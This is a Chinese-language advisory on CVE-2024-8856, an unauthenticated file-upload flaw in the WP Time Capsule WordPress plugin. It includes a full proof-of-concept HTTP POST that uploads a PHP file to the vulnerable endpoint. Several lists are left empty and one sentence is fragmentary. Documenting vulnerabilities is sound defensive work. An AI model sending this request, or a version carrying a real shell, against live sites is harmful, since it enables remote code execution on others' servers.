
WordPress WP Time Capsule 插件任意文件上传漏洞
CVE-2024-8856 是 WP Time Capsule WordPress 插件中存在的一个安全漏洞,允许未认证用户在服务器上上传任意文件。如果上传的文件被服务器执行,这可能导致远程代码执行。该漏洞源于不充分的文件验证,攻击者可通过向易受攻击的端点发送特制请求来利用此漏洞。
该漏洞允许未认证用户:
以下是通过向易受攻击的端点发送 POST 请求来利用 CVE-2024-8856 漏洞的概念验证。
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close
------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql
<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--
<?php phpinfo(); 的 PHP 文件,该文件如果被执行将显示 PHP 配置详情。/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php 是攻击利用点。为缓解该漏洞:
CVE-2024-8856 - 国家漏洞数据库
CVE-2024-8856 是一个严重漏洞,使用 WP Time Capsule 插件的 WordPress 站点管理员需要立即关注。应采取适当预防措施保护应用程序免受潜在利用。始终保持安全实践和插件更新。